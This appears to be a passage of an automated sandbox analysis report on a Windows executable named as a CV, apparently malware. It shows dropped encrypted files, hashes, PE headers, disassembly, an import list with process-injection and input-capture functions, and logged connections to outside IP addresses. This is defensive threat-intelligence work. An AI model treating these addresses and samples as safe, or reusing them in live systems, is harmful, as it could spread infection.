Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\autDF5B.tmp

Download File

Process:	C:\Users\user\Desktop\CV_ Filipa Barbosa.exe
File Type:	data
Category:	dropped
Size (bytes):	287744
Entropy (8bit):	7.99449127233639
Encrypted:	true
SSDEEP:	6144:cCHrhaK3z27g9ReoB29VCuIVnDL+mo6FOVNyFNrOGlWNfUn53FiX:ccamz27roY9pIVPRwNyFNbW653FM
MD5:	BBD9EDFAF1AC690F29BCDD1EA4D6A640
SHA1:	CA11B9073C96478F5CA55984EA821C3E82FD37D7
SHA-256:	2541667B1E5C328C931821168EB5D6245AA82BF2F65C9B4CBCFF1D297583EA1D
SHA-512:	C21080487EAD8221753274BB0CED44C2F36D2DEA416F8761F70FBAA6F408E5BCDC4AB3060DBF0629DCE515B66324D7C517B4304AF92796D2954991676E39A174
Malicious:	false
Reputation:	low
Preview:	...55F4G7NLJ.JT.ZPSY56FtG3NLJ4IJT7ZPSY56F4G3NLJ4IJT7ZPSY56F.G3NBU.GJ.>.q.Xy.g`/Z=l:F&-&V7p08[X)@gQ+l8A'j=Yz....[)P".CA@.IJT7ZPS 4?..'T.qS.w4P.J....&S.)...)-.-...eUQ.f.P&qS.JT7ZPSY5f.4G.OMJv1..7ZPSY56F.G1OGK?IJ.3ZPSY56F4G.ZLJ4YJT7*TSY5vF4W3NLH4ILT7ZPSY50F4G3NLJ49NT7XPSY56F6Gs.LJ$IJD7ZPSI56V4G3NLJ$IJT7ZPSY56F4G3NLJ4IJT7ZPSY56F4G3NLJ4IJT7ZPSY56F4G3NLJ4IJT7ZPSY56F4G3NLJ4IJT7ZPSY56F4G3NLJ4IJT7ZPSY56F4G3NLJ4IJT7ZPSY56F4G3NLJ4IJT7Z~'<MBF4Gg.HJ4YJT7.TSY%6F4G3NLJ4IJT7ZpSYU6F4G3NLJ4IJT7ZPSY56F4G3NLJ4IJT7ZPSY56F4G3NLJ4IJT7ZPSY56F4G3NLJ4IJT7ZPSY56F4G3NLJ4IJT7ZPSY56F4G3NLJ4IJT7ZPSY56F4G3NLJ4IJT7ZPSY56F4G3NLJ4IJT7ZPSY56F4G3NLJ4IJT7ZPSY56F4G3NLJ4IJT7ZPSY56F4G3NLJ4IJT7ZPSY56F4G3NLJ4IJT7ZPSY56F4G3NLJ4IJT7ZPSY56F4G3NLJ4IJT7ZPSY56F4G3NLJ4IJT7ZPSY56F4G3NLJ4IJT7ZPSY56F4G3NLJ4IJT7ZPSY56F4G3NLJ4IJT7ZPSY56F4G3NLJ4IJT7ZPSY56F4G3NLJ4IJT7ZPSY56F4G3NLJ4IJT7ZPSY56F4G3NLJ4IJT7ZPSY56F4G3NLJ4IJT7ZPSY56F4G3NLJ4IJT7ZPSY56F4G3NLJ4IJT7ZPSY56F4G3NLJ4IJT7ZPSY56F4G3NLJ4IJT7ZPSY56F4G3NLJ4IJT7ZPSY56F4G3NLJ4IJT7ZPSY56F4G3N

C:\Users\user\AppData\Local\Temp\chiffons

Download File

Process:	C:\Users\user\Desktop\CV_ Filipa Barbosa.exe
File Type:	data
Category:	dropped
Size (bytes):	287744
Entropy (8bit):	7.99449127233639
Encrypted:	true
SSDEEP:	6144:cCHrhaK3z27g9ReoB29VCuIVnDL+mo6FOVNyFNrOGlWNfUn53FiX:ccamz27roY9pIVPRwNyFNbW653FM
MD5:	BBD9EDFAF1AC690F29BCDD1EA4D6A640
SHA1:	CA11B9073C96478F5CA55984EA821C3E82FD37D7
SHA-256:	2541667B1E5C328C931821168EB5D6245AA82BF2F65C9B4CBCFF1D297583EA1D
SHA-512:	C21080487EAD8221753274BB0CED44C2F36D2DEA416F8761F70FBAA6F408E5BCDC4AB3060DBF0629DCE515B66324D7C517B4304AF92796D2954991676E39A174
Malicious:	false
Reputation:	low
Preview:	...55F4G7NLJ.JT.ZPSY56FtG3NLJ4IJT7ZPSY56F4G3NLJ4IJT7ZPSY56F.G3NBU.GJ.>.q.Xy.g`/Z=l:F&-&V7p08[X)@gQ+l8A'j=Yz....[)P".CA@.IJT7ZPS 4?..'T.qS.w4P.J....&S.)...)-.-...eUQ.f.P&qS.JT7ZPSY5f.4G.OMJv1..7ZPSY56F.G1OGK?IJ.3ZPSY56F4G.ZLJ4YJT7*TSY5vF4W3NLH4ILT7ZPSY50F4G3NLJ49NT7XPSY56F6Gs.LJ$IJD7ZPSI56V4G3NLJ$IJT7ZPSY56F4G3NLJ4IJT7ZPSY56F4G3NLJ4IJT7ZPSY56F4G3NLJ4IJT7ZPSY56F4G3NLJ4IJT7ZPSY56F4G3NLJ4IJT7ZPSY56F4G3NLJ4IJT7ZPSY56F4G3NLJ4IJT7Z~'<MBF4Gg.HJ4YJT7.TSY%6F4G3NLJ4IJT7ZpSYU6F4G3NLJ4IJT7ZPSY56F4G3NLJ4IJT7ZPSY56F4G3NLJ4IJT7ZPSY56F4G3NLJ4IJT7ZPSY56F4G3NLJ4IJT7ZPSY56F4G3NLJ4IJT7ZPSY56F4G3NLJ4IJT7ZPSY56F4G3NLJ4IJT7ZPSY56F4G3NLJ4IJT7ZPSY56F4G3NLJ4IJT7ZPSY56F4G3NLJ4IJT7ZPSY56F4G3NLJ4IJT7ZPSY56F4G3NLJ4IJT7ZPSY56F4G3NLJ4IJT7ZPSY56F4G3NLJ4IJT7ZPSY56F4G3NLJ4IJT7ZPSY56F4G3NLJ4IJT7ZPSY56F4G3NLJ4IJT7ZPSY56F4G3NLJ4IJT7ZPSY56F4G3NLJ4IJT7ZPSY56F4G3NLJ4IJT7ZPSY56F4G3NLJ4IJT7ZPSY56F4G3NLJ4IJT7ZPSY56F4G3NLJ4IJT7ZPSY56F4G3NLJ4IJT7ZPSY56F4G3NLJ4IJT7ZPSY56F4G3NLJ4IJT7ZPSY56F4G3NLJ4IJT7ZPSY56F4G3NLJ4IJT7ZPSY56F4G3N

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.137964850553259
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	CV_ Filipa Barbosa.exe
File size:	1'206'784 bytes
MD5:	a3c71c0be44a3f3585056acf51fd4c48
SHA1:	d3d80a14cdefbc31aec5d1e7c776c9e9982d8fc2
SHA256:	e49c85ea7591439d9ee2e654bfbc3a4b4cd3ce2ebcaa30f9cb57f2ab08effc61
SHA512:	7883f98e7169a8e1046ac5911c8b9f3aab97833e1d1b7af0dd145e1da0876030da09afdab103ee6cf22084aafdd9323ed5d3ed9527552f089e2e4a88d233a8db
SSDEEP:	12288:7tb20Qc3lT7af41ePBRYuQLKpqeUhbTv5OFgNuPPpHSgaTT5Wsk2rJ5blGx0igf1:7tb20pkaCqT5TBWgNQ7anBzbku8386A
TLSH:	C445C01373DDC365C3B25273BA65B701AEBB782506A1F96B2FD8093DB920122521E773
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d..............'.a.....H.k.....H.h.....H.i......}%......}5...............~.......k.......o.......1.......j.....Rich...........

File Icon


Icon Hash:	aaf3e3e3938382a0

Static PE Info

General

Entrypoint:	0x425f74
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x673F240E [Thu Nov 21 12:14:06 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	3d95adbf13bbe79dc24dccb401c12091

Entrypoint Preview

Instruction
call 00007F3B90BE598Fh
jmp 00007F3B90BD89A4h
int3
int3
push edi
push esi
mov esi, dword ptr [esp+10h]
mov ecx, dword ptr [esp+14h]
mov edi, dword ptr [esp+0Ch]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007F3B90BD8B2Ah
cmp edi, eax
jc 00007F3B90BD8E8Eh
bt dword ptr [004C0158h], 01h
jnc 00007F3B90BD8B29h
rep movsb
jmp 00007F3B90BD8E3Ch
cmp ecx, 00000080h
jc 00007F3B90BD8CF4h
mov eax, edi
xor eax, esi
test eax, 0000000Fh
jne 00007F3B90BD8B30h
bt dword ptr [004BA370h], 01h
jc 00007F3B90BD9000h
bt dword ptr [004C0158h], 00000000h
jnc 00007F3B90BD8CCDh
test edi, 00000003h
jne 00007F3B90BD8CDEh
test esi, 00000003h
jne 00007F3B90BD8CBDh
bt edi, 02h
jnc 00007F3B90BD8B2Fh
mov eax, dword ptr [esi]
sub ecx, 04h
lea esi, dword ptr [esi+04h]
mov dword ptr [edi], eax
lea edi, dword ptr [edi+04h]
bt edi, 03h
jnc 00007F3B90BD8B33h
movq xmm1, qword ptr [esi]
sub ecx, 08h
lea esi, dword ptr [esi+08h]
movq qword ptr [edi], xmm1
lea edi, dword ptr [edi+08h]
test esi, 00000007h
je 00007F3B90BD8B85h
bt esi, 03h
jnc 00007F3B90BD8BD8h
movdqa xmm1, dqword ptr [esi+00h]

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ASM] VS2012 UPD4 build 61030
[RES] VS2012 UPD4 build 61030
[LNK] VS2012 UPD4 build 61030

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xb7004	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc4000	0x5d8ec	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x122000	0x6c4c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x8d8d0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xb2730	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8d000	0x860	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x8b54f	0x8b600	f437a6545e938612764dbb0a314376fc	False	0.5699499019058296	data	6.680413749210956	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8d000	0x2cc42	0x2ce00	827ffd24759e8e420890ecf164be989e	False	0.330464397632312	data	5.770192333189168	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xba000	0x9d54	0x6200	e0a519f8e3a35fae0d9c2cfd5a4bacfc	False	0.16402264030612246	data	2.002691099965349	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xc4000	0x5d8ec	0x5da00	05b1c17051e1b7f5197d4b4211e79f10	False	0.9298048439586115	data	7.898376058181469	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x122000	0xa474	0xa600	0bc98f8631ef0bde830a7f83bb06ff08	False	0.5017884036144579	data	5.245426654116355	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xc45a8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0xc46d0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0xc47f8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xc4920	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	Great Britain	0.3333333333333333
RT_ICON	0xc4c08	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	Great Britain	0.5
RT_ICON	0xc4d30	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	Great Britain	0.2835820895522388
RT_ICON	0xc5bd8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	Great Britain	0.37906137184115524
RT_ICON	0xc6480	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	Great Britain	0.23699421965317918
RT_ICON	0xc69e8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	Great Britain	0.13858921161825727
RT_ICON	0xc8f90	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	Great Britain	0.25070356472795496
RT_ICON	0xca038	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	Great Britain	0.3173758865248227
RT_MENU	0xca4a0	0x50	data	English	Great Britain	0.9
RT_STRING	0xca4f0	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xcaa84	0x68a	data	English	Great Britain	0.2747909199522103
RT_STRING	0xcb110	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xcb5a0	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xcbb9c	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xcc1f8	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xcc660	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xcc7b8	0x54bf3	data			1.0003341754939892
RT_GROUP_ICON	0x1213ac	0x76	data	English	Great Britain	0.6610169491525424
RT_GROUP_ICON	0x121424	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0x121438	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0x12144c	0x14	data	English	Great Britain	1.25
RT_VERSION	0x121460	0xdc	data	English	Great Britain	0.6181818181818182
RT_MANIFEST	0x12153c	0x3b0	ASCII text, with CRLF line terminators	English	Great Britain	0.5116525423728814

Imports

DLL	Import
WSOCK32.dll	__WSAFDIsSet, recv, send, setsockopt, ntohs, recvfrom, select, WSAStartup, htons, accept, listen, bind, closesocket, connect, WSACleanup, ioctlsocket, sendto, WSAGetLastError, inet_addr, gethostbyname, gethostname, socket
VERSION.dll	GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_Create, InitCommonControlsEx, ImageList_ReplaceIcon
MPR.dll	WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll	InternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetConnectW, InternetQueryDataAvailable
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll	UnloadUserProfile, DestroyEnvironmentBlock, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll	IsThemeActive
KERNEL32.dll	HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetCurrentThread, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, DeleteCriticalSection, WaitForSingleObject, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, CloseHandle, GetLastError, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, RaiseException, InitializeCriticalSectionAndSpinCount, InterlockedDecrement, InterlockedIncrement, CreateThread, DuplicateHandle, EnterCriticalSection, GetCurrentProcess, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, HeapSize, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, SetFilePointer, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, HeapReAlloc, WriteConsoleW, SetEndOfFile, DeleteFileW, SetEnvironmentVariableA
USER32.dll	SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, DrawMenuBar, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, MonitorFromRect, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, CopyImage, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, UnregisterHotKey, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, DeleteMenu, PeekMessageW, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, CharLowerBuffW, GetWindowTextW
GDI32.dll	SetPixel, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, GetDeviceCaps, CloseFigure, LineTo, AngleArc, CreateCompatibleBitmap, CreateCompatibleDC, MoveToEx, Ellipse, PolyDraw, BeginPath, SelectObject, StretchBlt, GetDIBits, DeleteDC, GetPixel, CreateDCW, GetStockObject, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, EndPath
COMDLG32.dll	GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll	GetAclInformation, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, InitiateSystemShutdownExW, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, SetSecurityDescriptorDacl, AddAce, GetAce
SHELL32.dll	DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
OLEAUT32.dll	RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, UnRegisterTypeLib, SafeArrayCreateVector, SysAllocString, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, VariantCopy, VariantClear, CreateDispTypeInfo, CreateStdDispatch, DispCallFunc, VariantChangeType, SafeArrayAllocDescriptorEx, VariantInit

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 24, 2024 08:06:03.253392935 CET	49742	80	192.168.2.4	43.205.198.29
Nov 24, 2024 08:06:03.373048067 CET	80	49742	43.205.198.29	192.168.2.4
Nov 24, 2024 08:06:03.373364925 CET	49742	80	192.168.2.4	43.205.198.29
Nov 24, 2024 08:06:03.384186983 CET	49742	80	192.168.2.4	43.205.198.29
Nov 24, 2024 08:06:03.503818989 CET	80	49742	43.205.198.29	192.168.2.4
Nov 24, 2024 08:06:04.863132954 CET	80	49742	43.205.198.29	192.168.2.4
Nov 24, 2024 08:06:04.863157988 CET	80	49742	43.205.198.29	192.168.2.4
Nov 24, 2024 08:06:04.863334894 CET	49742	80	192.168.2.4	43.205.198.29
Nov 24, 2024 08:06:04.866981983 CET	49742	80	192.168.2.4	43.205.198.29
Nov 24, 2024 08:06:04.986463070 CET	80	49742	43.205.198.29	192.168.2.4
Nov 24, 2024 08:06:20.486135006 CET	49779	80	192.168.2.4	45.141.156.114
Nov 24, 2024 08:06:20.605614901 CET	80	49779	45.141.156.114	192.168.2.4
Nov 24, 2024 08:06:20.605699062 CET	49779	80	192.168.2.4	45.141.156.114
Nov 24, 2024 08:06:20.621568918 CET	49779	80	192.168.2.4	45.141.156.114
Nov 24, 2024 08:06:20.741069078 CET	80	49779	45.141.156.114	192.168.2.4
Nov 24, 2024 08:06:21.979880095 CET	80	49779	45.141.156.114	192.168.2.4
Nov 24, 2024 08:06:21.980324984 CET	80	49779	45.141.156.114	192.168.2.4
Nov 24, 2024 08:06:21.980375051 CET	49779	80	192.168.2.4	45.141.156.114
Nov 24, 2024 08:06:22.123398066 CET	49779	80	192.168.2.4	45.141.156.114
Nov 24, 2024 08:06:23.142852068 CET	49788	80	192.168.2.4	45.141.156.114
Nov 24, 2024 08:06:23.262629986 CET	80	49788	45.141.156.114	192.168.2.4
Nov 24, 2024 08:06:23.262717009 CET	49788	80	192.168.2.4	45.141.156.114
Nov 24, 2024 08:06:23.281595945 CET	49788	80	192.168.2.4	45.141.156.114
Nov 24, 2024 08:06:23.401196957 CET	80	49788	45.141.156.114	192.168.2.4
Nov 24, 2024 08:06:24.637145042 CET	80	49788	45.141.156.114	192.168.2.4
Nov 24, 2024 08:06:24.637264967 CET	80	49788	45.141.156.114	192.168.2.4
Nov 24, 2024 08:06:24.637312889 CET	49788	80	192.168.2.4	45.141.156.114
Nov 24, 2024 08:06:24.795177937 CET	49788	80	192.168.2.4	45.141.156.114
Nov 24, 2024 08:06:25.814327002 CET	49796	80	192.168.2.4	45.141.156.114
Nov 24, 2024 08:06:25.933922052 CET	80	49796	45.141.156.114	192.168.2.4
Nov 24, 2024 08:06:25.934003115 CET	49796	80	192.168.2.4	45.141.156.114
Nov 24, 2024 08:06:25.949848890 CET	49796	80	192.168.2.4	45.141.156.114
Nov 24, 2024 08:06:26.069742918 CET	80	49796	45.141.156.114	192.168.2.4
Nov 24, 2024 08:06:26.069751024 CET	80	49796	45.141.156.114	192.168.2.4
Nov 24, 2024 08:06:26.069758892 CET	80	49796	45.141.156.114	192.168.2.4
Nov 24, 2024 08:06:26.069792986 CET	80	49796	45.141.156.114	192.168.2.4
Nov 24, 2024 08:06:26.069930077 CET	80	49796	45.141.156.114	192.168.2.4
Nov 24, 2024 08:06:26.069935083 CET	80	49796	45.141.156.114	192.168.2.4
Nov 24, 2024 08:06:26.069957972 CET	80	49796	45.141.156.114	192.168.2.4
Nov 24, 2024 08:06:26.069962025 CET	80	49796	45.141.156.114	192.168.2.4
Nov 24, 2024 08:06:26.070014954 CET	80	49796	45.141.156.114	192.168.2.4
Nov 24, 2024 08:06:27.294137001 CET	80	49796	45.141.156.114	192.168.2.4
Nov 24, 2024 08:06:27.294413090 CET	80	49796	45.141.156.114	192.168.2.4
Nov 24, 2024 08:06:27.294460058 CET	49796	80	192.168.2.4	45.141.156.114
Nov 24, 2024 08:06:27.451353073 CET	49796	80	192.168.2.4	45.141.156.114
Nov 24, 2024 08:06:28.525746107 CET	49802	80	192.168.2.4	45.141.156.114
Nov 24, 2024 08:06:28.645277023 CET	80	49802	45.141.156.114	192.168.2.4
Nov 24, 2024 08:06:28.645375013 CET	49802	80	192.168.2.4	45.141.156.114
Nov 24, 2024 08:06:28.655790091 CET	49802	80	192.168.2.4	45.141.156.114
Nov 24, 2024 08:06:28.775372982 CET	80	49802	45.141.156.114	192.168.2.4
Nov 24, 2024 08:06:30.005597115 CET	80	49802	45.141.156.114	192.168.2.4
Nov 24, 2024 08:06:30.005816936 CET	80	49802	45.141.156.114	192.168.2.4
Nov 24, 2024 08:06:30.005908966 CET	49802	80	192.168.2.4	45.141.156.114
Nov 24, 2024 08:06:30.008831024 CET	49802	80	192.168.2.4	45.141.156.114
Nov 24, 2024 08:06:30.128362894 CET	80	49802	45.141.156.114	192.168.2.4
Nov 24, 2024 08:06:35.805778027 CET	49818	80	192.168.2.4	154.23.184.194
